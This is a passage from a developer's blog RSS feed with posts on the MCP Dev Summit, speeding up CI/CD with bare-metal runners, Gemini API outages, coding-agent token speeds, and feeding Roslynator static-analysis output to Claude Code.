      <guid isPermaLink="true">https://martinalderson.com/posts/tracking-mcp-server-growth/</guid>
      <pubDate>Sun, 12 Oct 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Notes from MCP Dev Summit Europe: Where the Protocol Is Headed</title>
      <description>Insights from MCP Dev Summit Europe on agentic discovery, client compatibility challenges, and the emerging field of agentic experience design</description>
      <content:encoded><![CDATA[<p>I've been at the MCP Dev Summit Europe conference today in London. I don't think I've seen such a busy conference so quickly after a technology has been announced - it's clear to me there is enormous interest in it. Furthermore, a lot of the attendees were from large corporates, which is a bit unusual with bleeding edge technologies in my experience.</p>
<h2>Future of MCP Protocol</h2>
<p>David Soria Parra from Anthropic did a really great talk updating on the progress of the MCP standard. I think the big takeaway for me was Agentic Discovery, which David mentioned was a vision for the next year.</p>
<p><img src="https://martinalderson.com/img/mcp-agentic-discovery.png" alt="MCP Agentic Discovery"></p>
<p>It feels like the use case for MCP Registry isn't an app store as we knew it from mobile apps, but MCPs discovered by LLMs that then install themselves.</p>
<p>I have big concerns about how this vision is going to work from a security perspective, but (small) steps are being made with DNS and GitHub based authentication for MCP servers. It's very hard to protect against prompt injection attacks, even when they are manually 'hand picked'. Having any kind of automated installation process is going to make it far harder.</p>
<p>If the security issues could be mitigated it opens so many incredible use cases for non technical end users. Configuring and installing MCP servers is too hard at the moment, so if it could figure out how to get the users data I think it's going to be absolutely transformative for b2b use cases, but also b2c - you can imagine it for travel finding flights, checking you in, booking your hotel and restaurants - across dozens of MCP servers, completely transparently to the user.</p>
<h2>MCP clients support very little of the MCP standard</h2>
<p>I hadn't quite put two and two together and realised how little of the MCP standard clients support. From data from the HuggingFace MCP server, these are the most popular MCP clients:</p>
<p><img src="https://martinalderson.com/img/mcp-popular-clients.png" alt="MCP Popular Clients"></p>
<p>and overall support of various primitives:</p>
<p><img src="https://martinalderson.com/img/mcp-client-compatibility.png" alt="MCP Client Compatibility"></p>
<p>Unfortunately the rate of compatibility for MCP clients supporting anything apart from the most basic parts of the spec is very low. Again, another chicken and egg problem.</p>
<p>I think it's important to keep this in mind when designing MCP servers. It's very easy to get excited by all the new parts of the spec (for good reason!) but for real world workflows it's reminding me a bit of the early web browsers with very fragmented compatibility, so much so it wasn't really worth pushing the envelope far. Hopefully this changes quickly, but my gut feeling says we're going to see much more of this and a lot of falling back to 'lowest common denominator' with MCP.</p>
<h2>MCP Gateways</h2>
<p>There are a <em>lot</em> of gateways for MCP being built, effectively &quot;Cloudflare for MCP&quot;. Many of these looked genuinely interesting and it'll be interesting to see who gains marketshare on this.</p>
<p>The <em>main</em> selling point of these seemed to be easy OAuth integration, amongst other features. People aren't enjoying implementing OAuth for MCP, especially dynamic client registration which virtually none of the well known auth-as-a-service providers implement correctly out of the box.</p>
<h2>AX - Agentic Experience</h2>
<p>Finally I really enjoyed Frédéric Barthelet's talk on AX (agentic experience, similar to UX and DX). There was a lot of good stuff in the talk, and you can <a href="https://www.figma.com/slides/vCh5UcyYL2ZHiyNlHTBUXA/Running-efficient-MCP-servers-in-production?node-id=1-199&amp;t=OQ2YEFAfWcNCpFCi-0">find the slides here</a> which I'd really recommend reading through.</p>
<p>Very simple things - like having param sigs take a variety of formats can radically improve the accuracy of tool results.</p>
<p><img src="https://martinalderson.com/img/mcp-param-formats.png" alt="MCP Parameter Format Examples"></p>
<p>Another good one was really thinking about error messages - far more than you'd probably think of in most software engineering.</p>
<p><img src="https://martinalderson.com/img/mcp-error-messages.png" alt="MCP Error Message Examples"></p>
<p>I'm looking forward to reading more about AX - which I think is going to become a whole specialisation of its own in the very near future.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/notes-from-mcp-europe/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/notes-from-mcp-europe/</guid>
      <pubDate>Thu, 02 Oct 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>How I make CI/CD (much) faster and cheaper</title>
      <description>Why GitHub Actions runners are slow and how bare metal servers can make your CI/CD 2-10x faster while costing 10x less</description>
      <content:encoded><![CDATA[<p>One often overlooked element of the software development lifecycle is CI/CD speed, and relatively how easy it is to improve this with better hardware.</p>
<h2>Why does it matter?</h2>
<p>CI/CD speed really helps developers stay more efficient on their tasks. The two main benefits are:</p>
<ul>
<li><strong>Improved developer productivity.</strong> There's nothing worse than having to wait for a very long CI/CD pipeline to run for even small changes. It really breaks you out of the flow.</li>
<li><strong>Quicker deployments.</strong> I've seen some CI/CD pipelines that take nearly an hour to test, build and deploy changes. This slows down the pace of change in your product, and can really bite you when you have a production issue that needs hotfixed as quickly as possible. In my experience this then leads to CI/CD checks being skipped to put fires out, which can then cause other regressions.</li>
</ul>
<p>With AI agents, CI/CD can now take as long to run (if not longer) as doing small/medium sized changes. <a href="https://en.wikipedia.org/wiki/Amdahl%27s_law">Amdahl's Law</a> rears its ugly head again in the software development lifecycle.</p>
<h2>The hardware is too damn slow</h2>
<blockquote>
<p>This applies to all CI/CD platforms that I've come across, not just GitHub Actions.</p>
</blockquote>
<p>Nearly all organisations I know tend to use the standard GitHub Action Workers. You may use the larger runners even. They are convenient and don't require any operations. However, like many things in the cloud, they are <em>slow</em>.</p>
<p>The default runner GitHub actions runner has 2vCPUs and 7GB of RAM. While 7GB of RAM sounds passable, 2vCPUs is incredibly vague.</p>
<blockquote>
<p>A vCPU usually refers to a thread rather than a physical core. With hyperthreading and oversubscription on shared cloud infrastructure, you're typically getting a fraction (~50%) of an already-shared physical core from a server CPU that's optimized for massive multithreading, not single-thread performance. Some EPYC CPUs designed for hyperscalers even use efficiency cores (4c/5c) which are even slower but pack more cores per die - though it doesn't look like these ones are being used here.</p>
</blockquote>
<p>Doing some diagnostic checks (these may vary), I was getting consistently EPYC 7763 CPU, which is nearly 5 years old now. It also only supports AVX2 and not AVX512 which can provide a very nice additional speedup for many software engineering tasks.</p>
<p>Let's compare this to the latest Ryzen CPUs at the time of writing on <a href="https://www.cpubenchmark.net/compare/4207vs6549/AMD-EPYC-7763-vs-AMD-Ryzen-9-9950X3D">CPU benchmark</a>. <strong>Keep in mind we only have one physical core assigned - not 64!</strong></p>
<p><img src="https://martinalderson.com/img/cpu-benchmark-comparison.png" alt="CPU Benchmark Comparison"></p>
<p>As you can see on single thread performance, the Ryzen 9950X3D is ~twice as fast at single thread performance - and despite only having one quarter of the CPU cores, is nearly as fast as the Epyc chip in multicore.</p>
<p>Let's compare the two side by side:</p>
<table>
<thead>
<tr>
<th></th>
<th>GitHub Actions (EPYC 7763)</th>
<th>Ryzen 9950X3D</th>
<th>Comparison</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Release Year</em></td>
<td>Q1 2021</td>
<td>Q1 2025</td>
<td><strong>4</strong> years newer</td>
</tr>
<tr>
<td><em>Cores Available</em></td>
<td>1 physical (2 threads)</td>
<td>16 cores (32 threads)</td>
<td><strong>16x</strong> cores</td>
</tr>
<tr>
<td><em>Base/Turbo Clock</em></td>
<td>2.5 GHz / 3.5 GHz</td>
<td>4.3 GHz / 5.7 GHz</td>
<td><strong>1.7x</strong>/<strong>1.6x</strong></td>
</tr>
<tr>
<td><em>L1d Cache</em></td>
<td>32 KiB (1 core)</td>
<td>512 KiB (16 cores)</td>
<td><strong>16x</strong> total</td>
</tr>
<tr>
<td><em>L1i Cache</em></td>
<td>32 KiB (1 core)</td>
<td>512 KiB (16 cores)</td>
<td><strong>16x</strong> total</td>
</tr>
<tr>
<td><em>L2 Cache</em></td>
<td>512 KiB (1 core)</td>
<td>16 MiB (16 cores)</td>
<td><strong>32x</strong> total</td>
</tr>
<tr>
<td><em>L3 Cache</em></td>
<td>32 MiB (shared, 0.5-8MB effective)</td>
<td>128 MiB (3D V-Cache)</td>
<td><strong>16-256x</strong> effective</td>
</tr>
<tr>
<td><em>AVX Support</em></td>
<td>AVX2 (256-bit)</td>
<td>AVX-512 (512-bit)</td>
<td><strong>2x</strong> wider vectors</td>
</tr>
<tr>
<td><em>Memory Speed</em></td>
<td>DDR4-2666 (likely)</td>
<td>DDR5-5600+</td>
<td><strong>2.1x</strong> faster</td>
</tr>
<tr>
<td><em>Single Thread Rating</em></td>
<td>2,518</td>
<td>4,737</td>
<td><strong>1.88x</strong> faster</td>
</tr>
<tr>
<td><em>Multi Thread Rating</em></td>
<td>~2,000-5,000 (server load)</td>
<td>70,193</td>
<td><strong>14-35x</strong> faster</td>
</tr>
</tbody>
</table>
<p>As you can see, a pretty standard gaming CPU absolutely wipes the floor with the standard cloud hosted runners.</p>
<p>Just on single threaded CPU alone, you will basically <strong>double</strong> the speed of your pipelines on any serial CPU contended parts just by switching to a bare metal server.</p>
<h2>I/O</h2>
<p>It gets even worse for the standard runners though. Doing some non-scientific testing (but matches my anecdotal experience), I/O is incredibly slow.</p>
<p>Accessing a 10GB file on disk with dd we get:</p>
<ul>
<li>Write: ~200MB/sec</li>
<li>Read: ~200MB/sec</li>
</ul>
<p>A fairly affordable PCIe5 NVMe on bare metal will give <strong>6000MB/sec</strong> quite easily - 30x faster. Given you probably aren't to worried about data integrity in CI/CD, you could even run them in RAID0 and get 2x the speed 🤯</p>
<p>It gets even worse for general small file access, with very slow IOPS (around 10,000, but varies a lot depending on neighbours), vs 1million+ on a PCIe5 NVMe. This is a real killer for software developers, with npm often installing hundreds of thousands of small files. It also explains the dreadful performance I'm sure you're aware of of apt-get.</p>
<h2>Networking</h2>
<p>The final problem I see with hosted runners, is that they aren't located near your infrastructure for testing - sometimes you'll have other services your pipelines need to call out to.</p>
<p>I seem to randomly get assigned servers in US Central and US East on GitHub Actions. However, being in the UK, that's 100ms of latency to some of our European operations. This can really add up - and if you are in Asia, Africa, LatAm or Oceania can be a total killer.</p>
<p>It also is a lot easier to lock down just a handful of known static IP ranges for security on these, vs having to either whitelist huge ranges or pay for GitHub Enterprise.</p>
<h2>Overall comparison and pricing</h2>
<p>I'd recommend getting a bare metal Ryzen server with as much RAM as you can afford. OVH is a good option, so is Hetzner.</p>
<p>For example, Hetzner offers a AMD Ryzen 7950X3D with 128GB of DDR5 and 2TB of PCIe4 NVMe for ~$100/month.</p>
<p>While not quite as fast as the above comparison, it's very close. I suspect if you move your CI/CD workflows to this, you'll find they run 2-10x faster straight away without any configuration changes - all you have to do is secure the box appropriately and setup the GitHub actions self runner, which is very simple to do.</p>
<p>To get roughly comparable hardware from GitHub actions you need to use the 32 core runner, which costs $0.128/min, or $5000+/month for sustained usage! And even then it likely will be (often significantly) slower for many tasks because of the lower single thread performance and IO issues (which AFAIK do not change radically with more cores).</p>
<p>Now, you may not have sustained usage 24/7 on your pipelines, which doesn't make it a particularly fair comparison - but even assuming a 25% usage level, it works out 10x cheaper for significantly more speed.</p>
<p>CI/CD is a perfect use case for bare metal - even if the machine goes offline (which in my experience is much more rare than GitHub <em>itself</em> going down!), its a one line change to your pipelines.yml to go back to GitHub hosted ones.</p>
<p>It's also an absolute no brainer if you are also seeing huge cost increases on your GitHub actions bill because you are running many more PRs and deployments with agentic software engineering.</p>
<p>*NB: There are SaaS providers offering this kind of setup, but the pricing is nowhere near competitive with bare metal, and in my experience the management of these is so trivial it's much better to just get a bare metal box or ten and set it up yourself. You can also get the very fastest hardware easily and choose a provider that is geographically close to you.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/how-i-make-cicd-much-faster-and-cheaper/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/how-i-make-cicd-much-faster-and-cheaper/</guid>
      <pubDate>Sun, 28 Sep 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Google AI Studio API has been unreliable for the past 2 weeks</title>
      <description>Google&#39;s Gemini AI Studio API has been suffering from severe reliability issues with little transparency about the problems on their status page.</description>
      <content:encoded><![CDATA[<p>Something weird is going on with Google's Gemini via their AI studio API. I've been using it for a lot of random projects, with Flash 2.5 being a great model and it has a generous free tier - with the ability to not enable billing, so random side projects can't accidently run up an enormous bill.</p>
<p>I had noticed sporadic 503 &quot;The model is overloaded. Please try again later.&quot; errors recently but didn't think too much of it. However, building an MVP on top of it for a more 'serious' use case (with billing enabled, I should add!) made me look a bit deeper.</p>
<h2>The Transatlantic Timeout</h2>
<p>I've noticed increasingly over the last month or two all of the providers start really struggling in the afternoon European time/morning Eastern. Usually when I hit issues, I check the clock and it's roughly 3pm UK time.</p>
<p>I suspect this is because everyone in Europe is working with LLMs, and when the US starts getting online there isn't enough capacity for both.  I'm coining this the &quot;Transatlantic Timeout&quot;, in the spirit of <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">Simon Willison's &quot;Lethal Trifecta&quot;. </a></p>
<p>I've noticed both Claude Code and Gemini's API gets <em>much</em> worse at this time in general.</p>
<p>Gemini has a real problem though - AI studio is just not working right, and frustratingly the <a href="https://aistudio.google.com/status">status page</a> isn't reporting it at all:</p>
<p><img src="https://martinalderson.com/img/google-ai-studio-status-page.png" alt="Google AI Studio status page showing all systems operational"></p>
<p>Looking into it more, we can see huge problems on OpenRouter's reliability graph especially on Pro:</p>
<p><img src="https://martinalderson.com/img/openrouter-gemini-reliability.png" alt="OpenRouter reliability data showing Gemini Pro issues"></p>
<p>Note that even overall OpenRouter requests are failing (the green line) - which is meaning a significant degradation in service.</p>
<blockquote>
<p>OpenRouter can try and reroute requests between providers, and Gemini is available via two sets of infrastructure - AI Studio and Vertex- I'm not sure how much they overlap behind the scenes.</p>
</blockquote>
<h2>It's all went bananas?</h2>
<p>To make matters worse, a lot of GitHub repos that Google is responsible for have had issues for 2 weeks with not much communication:</p>
<p><img src="https://martinalderson.com/img/gemini-cli-github-issue.png" alt="Gemini CLI GitHub issue showing API problems">
<em><a href="https://github.com/google-gemini/gemini-cli/issues/7227">Gemini CLI GitHub Issue #7227</a></em></p>
<p><img src="https://martinalderson.com/img/python-genai-github-issue.png" alt="Python GenAI GitHub issue showing similar problems">
<em><a href="https://github.com/googleapis/python-genai/issues/1373">Python GenAI GitHub Issue #1373</a></em></p>
<p>Strangely, if you use Gemini CLI with a personal auth token, its pretty reliable (perhaps that is served via Vertex?).</p>
<p>The only thing I can think of is the degradation of service started happening when the new Nano Banana image generation API came out (roughly), so perhaps that's the underlying drain on resources.</p>
<p>Regardless - I really think Google (and all inference providers) need to do a better job at relaying issues like this on their status page.</p>
<p>My strong recommendation is to check OpenRouter until this situation improves and use that as a status page if you're having issues. OpenRouter's graphs and transparency are a real asset to the LLM community and I hope they continue to provide this data to everyone.</p>
<p>Hopefully Google can provide an update on what went wrong here. Obviously services can have problems, but the lack of transparent status pages really wastes a lot of time.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/google-ai-studio-api-unreliable-for-two-weeks/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/google-ai-studio-api-unreliable-for-two-weeks/</guid>
      <pubDate>Wed, 24 Sep 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>What happens when coding agents stop feeling like dialup?</title>
      <description>From magical to frustrating in months. Why AI coding agents feel like dial-up internet and what ultra-fast inference could unlock for developer productivity.</description>
      <content:encoded><![CDATA[<p>It's funny how quickly humans adjust to new technology. Only a few months ago Claude Code and other agents felt like magic, now it increasingly feels like browsing the internet in the late 90s on a dialup modem.</p>
<p>Firstly, Anthropic has been suffering from pretty <a href="https://status.anthropic.com/incidents/s1cd6vc8wms9">terrible</a> <a href="https://status.anthropic.com/incidents/pstkfl3t9jfd">reliability</a> <a href="https://status.anthropic.com/incidents/k6gkm2b8cjk9">problems</a> . And looking at OpenRouter's data they are not alone (nb. OpenRouter's data is not conclusive, but I believe it does give a somewhat interesting overview of reliability).
<img src="https://martinalderson.com/img/openrouter-reliability-data.png" alt="OpenRouter API reliability data">
<img src="https://martinalderson.com/img/openrouter-model-availability.png" alt="OpenRouter model availability stats">
If you've been using coding agents, you'll know how flakey they can be, often getting stuck and requiring retries, a bit like your 56k's modem dropping in bad weather or someone wanting to do a call.</p>
<p>This isn't unsurprising, as much as some commentators believe AI is overhyped, because AI token usage is absolutely exploding. While the 'Big 3' AI companies (Google, Anthropic and OpenAI) don't publish public statistics, OpenRouter does:</p>
<p><img src="https://martinalderson.com/img/openrouter-token-usage-growth.png" alt="OpenRouter token usage growth chart">
Again, we must caveat this data strongly:</p>
<ul>
<li>Firstly, OpenRouter almost certainly routes a tiny proportion of LLM requests vs the global market, meaning these statistics could be distorting trends</li>
<li>Secondly, Grok (especially) is &quot;dumping&quot; a lot of free LLM tokens on the market getting feedback on their models via OpenRouter, which is probably twisting these statistics</li>
</ul>
<p>The fact that we're trying to understand a revolutionary shift in software development through the tiny window of OpenRouter's data is telling. Google, Anthropic, and OpenAI guard their usage statistics like state secrets. The only glimpse we get is from OpenRouter, which likely handles &lt;1% of global LLM traffic, yet even this tiny sample shows a 50x increase.</p>
<p>Given that agentic coding workflows consume probably something on the order of 1000x the tokens that non-agentic 'chats' or most API calls do, so it is not surprising to see such a big increase.</p>
<p>This is no doubt putting absolutely enormous strain on the infrastructure behind the scenes,  which reminds me a lot of the first days of broadband when the ISPs really struggled to handle peak time loads on their interconnects.</p>
<h2>Tok/s is all we need?</h2>
<p>More interestingly is the speed at which LLMs operate. Right now frontier models tend to crawl along at 30-60tok/s, which for me at least when I'm operating Claude Code in fully supervised mode is slow enough to get frustrating.</p>
<p>I haven't had success trying to run multiple Claude Code instances at once - the context switching involved becomes too intense past two instances, for me at least. The workflow I've managed to get onboard with is having one agent in plan mode planning the next task, while I work on one in supervised mode, but even this has drawbacks as it gets out of date with the changes.</p>
<p>I've been playing around with <a href="https://www.cerebras.ai/blog/introducing-cerebras-code">Cerebras Code</a> which (was) a fork of Gemini CLI produces tokens 20-50x faster (very similar to the leap from dialup to the first ADSL/cable modems in speed increase).</p>
<p>At 2000tok/s suddenly the bottleneck very quickly becomes you. It becomes very tempting to just start accepting everything, because it comes in so fast, which leads to terrible results. Gemini CLI currently still feels very far behind Claude Code, especially in context management, so it wasn't quite the leap forward I was hoping for, but did give me a glimpse of the future.</p>
<p>However, it did get me thinking to what huge amounts of tok/s would allow, but first let me explain how I think about the milestones in LLMs for software engineering.</p>
<h2>Where we are on the coding agent journey</h2>
<p>My journey with LLMs for software development in a professional sense has had 3 main phases so far:</p>
<ul>
<li><strong>GPT3.5 era:</strong> asking the odd question, and usually getting a very hallucinated answer on anything non-trivial. Where we are now felt very very far away when we were here.</li>
<li><strong>GPT4/Sonnet 3.5 era:</strong> the quality of the responses improved so much that it became an essential assistant to ask questions and write small snippets of code. I never seemed to gel with in IDE assistants, so it was a lot of copying and pasting between the IDE and the chat UI</li>
<li><strong>Supervised CLI Agents:</strong> we're here now, where most of my development work is assisted by a coding agent, with me supervising all output.</li>
</ul>
<p>I think the next era, which I think may be enabled very soon by much higher tok/s infrastructure, is a more unsupervised approach where perhaps 5-10 attempts are made in parallel at a task by the agent. Some (semi?) automated evaluation happens and you get presented with the 'best one' and then iterate from there.</p>
<p>This does match my experience with running agents in unsupervised mode, sometimes it gets it, but mostly it doesn't and it's better to start from scratch. Running in supervised mode allows you to stop this diverging.</p>
<p>You may ask why we can't just do this with slower models - and while we definitely can, I think for developer experience waiting 1-10 minutes for a bunch of options breaks the development cycle too much. If we were running at 2000tok/s we could basically get an order of magnitude more complicated tasks done in a similar workflow speed as we have now.</p>
<h2>Infinite demand loop</h2>
<p>We're trapped in a potentially infinite demand loop that makes traditional infrastructure scaling look quaint. Every time we improve the LLM models, we don't just use it more efficiently - we fundamentally change how we work in ways that consume an order of magnitude more resources.</p>
<p>A lot of the discourse in the press is expecting something similar to what happened in the early 2000s <a href="https://en.wikipedia.org/wiki/Telecoms_crash">telecoms crash</a> - where capacity was built out far faster than consumption (and in recent years, broadband bandwidth consumption has virtually plateaued - growing only 10-15% y/y in many markets). While I'm not ruling out some pullback in datacentre construction, I don't see the fundamental demand curve flatlining in the same way.</p>
<p>This is, however, where my ISP analogy breaks down. The speed of semiconductor process improvements has really stalled over the past years (unlike networking capacity which has grown far faster than demand). This then leads to limited efficiency improvements - and is setting a 'cap' on how much supply can be delivered.</p>
<h2>Charging models</h2>
<p>I think this will then result in less advantageous pricing models for developers, which are very 'unrefined'. While I don't think <a href="https://martinalderson.com/posts/are-openai-and-anthropic-really-losing-money-on-inference/">inference is a huge loss leader</a>; there are clearly huge challenges for the providers at 'peak times'. These tend to be when both the US market and Europe market overlap in work hours.</p>
<p>There must be enormous spare capacity outside these hours, and I think we'll see 'off peak' plans allowing far more consumption outside the peak windows. While OpenAI and Anthropic offer reduced rates for batch processing, this isn't quite the same thing as it's not suitable for interactive agentic workflows. I also suspect we'll see other pricing model &quot;innovation&quot; to try and flatten the demand across the day.</p>
<h2>The bottom line</h2>
<p>Each of these 'phases' of LLM growth is unlocking a lot more developer productivity, <em>for teams and developers that know how to harness it</em>. I think there is a lot of change coming to how software engineers work and a lot of developers and teams are not prepared for it.</p>
<p>My recommendation is to really keep up to date with the all the developments and try and be as curious as possible - I learnt this the hard way by totally discounting Claude Code as a dead end until I tried it properly for a few hours and realised how powerful it was compared to a lot of the other approaches I'd seen.</p>
<p>I don't think we're in a transition period heading towards stability any time soon and it feels like there is still so much <a href="https://martinalderson.com/posts/claude-code-static-analysis/">low hanging fruit</a> to improve agents on a tooling level, never mind what would be possible with much faster models.</p>
<p>In my experience the developers that can harness this change the best are the more experienced ones. However, paradoxically in my experience these are often the ones that dismiss it the most.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/what-happens-when-coding-agents-stop-feeling-like-dialup/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/what-happens-when-coding-agents-stop-feeling-like-dialup/</guid>
      <pubDate>Fri, 19 Sep 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Solving Claude Code&#39;s API Blindness with Static Analysis Tools</title>
      <description>How to give AI coding assistants complete visibility into APIs and third-party libraries using static analysis instead of basic text search.</description>
      <content:encoded><![CDATA[<p>One of the main frustrations I have with Claude Code (or any coding agent) is its over-reliance on grep-style code search while it is working, when actually there are far more effective ways to do this with static code analysis.</p>
<p>This leads to many problems you'll probably be familiar with:</p>
<ul>
<li>Making up non existent APIs in (mostly, but not always, niche) libraries, or using them with the wrong method signature</li>
<li>Half-done refactoring, where it refactors some of it but misses other parts of your codebase</li>
<li>Missing overloads on methods and going down the wrong path, often reimplementing something the interface already supports</li>
</ul>
<p>Of course, if you have used a statically typed language you'll know this is a solved problem, with very rich static analysis in IDEs allowing autocomplete and advanced refactoring in a few keystrokes.</p>
<p>I'm going to focus on the dotnet ecosystem in this article I'll link some options for other languages.</p>
<h2>Enter Roslynator CLI</h2>
<p>While I think there is a really interesting potential with using for MCP for this, I wanted to get started pretty quickly. I've used the Roslynator CLI before in CI/CD and thought it'd be perfect for this.</p>
<p>If you're not familiar with <a href="https://github.com/dotnet/roslyn">Rosyln</a> it's the open source compiler for C# that Microsoft maintains (think of it similar to tsc for TypeScript, or CPython for Python). There is an awesome CLI tool called Roslynator which provides a CLI interface for performing static analysis on your project(s).</p>
<p>It's also very easy to use, and therefore very easy to add to your CLAUDE.md file (or equivalent).</p>
<h3>The Magic Command</h3>
<pre><code class="language-bash">roslynator list-symbols
</code></pre>
<p>This single command gives you every public method, property, and field in the assembly, complete with their full type signatures and generic constraints. You'll see extension methods along with their true locations (no more hunting through random static classes), plus all the assembly metadata and documentation comments that come with the package. It's essentially a complete X-ray of the API surface that Claude Code can actually read and understand.</p>
<h2>A simple example</h2>
<p>I built a very simple dotnet console app using the SixLabors ImageSharp package. Running the command on my project gives output like this:</p>
<img src="https://martinalderson.com/img/roslynator-api-output.png" alt="Roslynator API output showing method signatures and types" class="no-border">
This is obviously a simple example, but this gets incredibly powerful when you have a complex codebase. Even in this simple example it can now know all the classes and their exact method signatures in your project. 
<h2>Getting information on third party libraries</h2>
<p>The ImageSharp library is incredibly powerful and flexible, but has thousands of public methods. It's exactly the kind of library Claude Code has problems with and usually makes a total mess of things and I revert to copying and pasting documentation into prompts.</p>
<p>With some prompt help, Claude Code can quickly create commands like this:</p>
<pre><code> roslynator list-symbols ConsoleApp.csproj \
    --external-assemblies &quot;~/.nuget/.../SixLabors.ImageSharp.Drawing.dll&quot; \
    --visibility public --depth member | grep -i &quot;drawtext&quot;
</code></pre>
<p>This then returns the complete API surface for drawing text with this package, so it can then draw text perfectly without an endless loop of method names, web searches and me giving up and pasting the API docs into it (if they exist!.)</p>
<p>One issue arises though. This output is often so big Claude Code has trouble with it.</p>
<h2>Putting it all together - building a docs wiki for Claude Code</h2>
<p>The next thing I did was gave Claude Code access to all this information ahead of time.</p>
<p>Let's have Roslynator document our entire project AND each third party library. I ended up with a folder structure like this:</p>
<pre><code>  docs/
  ├── README.md                           # Overview and usage guide
  ├── project-api.txt                     # Your project's complete API
  └── thirdparty/                         # Third-party library APIs
      ├── SixLabors.Fonts-api.txt         # Font handling APIs
      ├── SixLabors.ImageSharp-api.txt    # Core image processing APIs
      └── SixLabors.ImageSharp.Draw...    # Drawing and text APIs
</code></pre>
<p>I quickly put together a shell script (which you can grab from <a href="https://gist.github.com/martinalderson/512284fa91d940aa86272744a3c1ee48">this gist</a>) which looks for all package references in the csproj, and then finds them in the nuget cache and documents them using Roslynator.</p>
<p>Now we can just add some simple instructions to CLAUDE.md to have it use this for our project.</p>
<pre><code># .NET API Discovery with Roslynator

  ## Installation
  ```bash
  dotnet tool install -g roslynator.dotnet.cli

  Key Commands

  # List all project APIs
  roslynator list-symbols MyProject.csproj --visibility public --depth member

  # Include external NuGet packages
  roslynator list-symbols MyProject.csproj --external-assemblies &quot;path/to/package.dll&quot;

  # Save to file for searching
  roslynator list-symbols MyProject.csproj --output api-docs.txt

  # Autogen full docs (rerun after adding packages or API changes)
  ./generate-docs.sh MyProject.csproj

  Documentation Structure

  Check the docs/ folder after running generate-docs.sh:
  - project-api.txt contains your project's complete API
  - thirdparty/ contains auto-discovered NuGet package APIs
</code></pre>
<p>This now gives Claude Code all it needs to know to be able to understand and work with <em>any</em> third party SDK, and complex structures. I've found it a huge leap forward in productivity with Claude Code - it reduces the frustrating edit - failed build - edit loop substantially especially on bigger projects.</p>
<h2>Other environments</h2>
<p>You can use the exact same approach with any typed language. Here's some pointers for other environments which may or may not be up to date:</p>
<h3>TypeScript</h3>
<p>The TypeScript compiler itself has excellent static analysis capabilities built in. You can use <code>tsc</code> with the <code>--declaration</code> flag to generate <code>.d.ts</code> files, or use tools like:</p>
<ul>
<li><strong>TypeDoc</strong>: <code>typedoc --json api.json src/</code> generates complete API documentation in JSON format</li>
<li><strong>ts-morph</strong>: For more advanced analysis, this provides a programmatic API to traverse the TypeScript AST</li>
<li><strong>dts-bundle-generator</strong>: Extracts all type definitions from node_modules into readable files</li>
</ul>
<p>For Claude Code, TypeDoc's JSON output is particularly useful as it includes all method signatures, types, and JSDoc comments.</p>
<h3>Golang</h3>
<p>Go's tooling philosophy of simplicity extends to API discovery:</p>
<ul>
<li><strong>go doc</strong>: <code>go doc -all github.com/gin-gonic/gin</code> prints all exported symbols and their documentation</li>
<li><strong>go list</strong>: <code>go list -json -deps ./...</code> provides detailed package information in JSON format</li>
<li><strong>guru</strong>: For more advanced analysis, <code>guru describe</code> gives detailed type information at any code position</li>
</ul>
<p>For third-party packages, <code>go doc -all</code> combined with module paths from <code>go.mod</code> gives you everything. The output is already in a clean, grep-friendly format that Claude Code can parse easily.</p>
<h3>Java</h3>
<p>Java's rich reflection and bytecode analysis ecosystem makes this straightforward:</p>
<ul>
<li><strong>javap</strong>: Built into the JDK, <code>javap -public -cp library.jar com.example.ClassName</code> shows all public methods and signatures from compiled classes</li>
<li><strong>javadoc</strong>: With the <code>-doctitle</code> and <code>-d</code> flags, generates complete HTML documentation including third-party JARs on your classpath</li>
<li><strong>jdeps</strong>: <code>jdeps -apionly library.jar</code> analyzes dependencies and public APIs</li>
<li><strong>Reflection</strong>: A simple Java script using <code>Class.forName()</code> and <code>getMethods()</code> can dump any JAR's complete API to a text file</li>
</ul>
<p>For Maven projects, <code>mvn dependency:build-classpath</code> gives you all JAR paths, which you can then feed to javap for complete API extraction of all dependencies.</p>
<h2>Conclusion</h2>
<p>What strikes me most about this approach is how much untapped potential exists in bridging traditional developer tooling with AI coding assistants. We've spent decades building sophisticated static analysis tools, debuggers, profilers, and linters - yet most AI agents are still fumbling around with basic text search like it's 1995.</p>
<p>This Roslynator integration is just scratching the surface. Imagine if Claude Code had native understanding of:</p>
<ul>
<li><strong>Test coverage data</strong> - understanding which code paths are tested and which aren't before making changes</li>
<li><strong>Performance profiler output</strong> - seeing hot paths and bottlenecks to guide optimization decisions</li>
<li><strong>Build system internals</strong> - understanding compilation order, incremental build dependencies, and why that one file keeps breaking everything</li>
<li><strong>Git blame and history</strong> - knowing who touched what and why, understanding the evolution of tricky code sections</li>
<li><strong>Database schemas and query plans</strong> - actual table structures instead of guessing column names</li>
<li><strong>Live debugger integration</strong> - setting breakpoints, inspecting runtime state, understanding actual vs expected behavior</li>
<li><strong>Memory profilers and heap dumps</strong> - finding leaks and understanding object relationships</li>
<li><strong>Linter and security scanner results</strong> - knowing existing code smells and vulnerabilities before making them worse</li>
</ul>
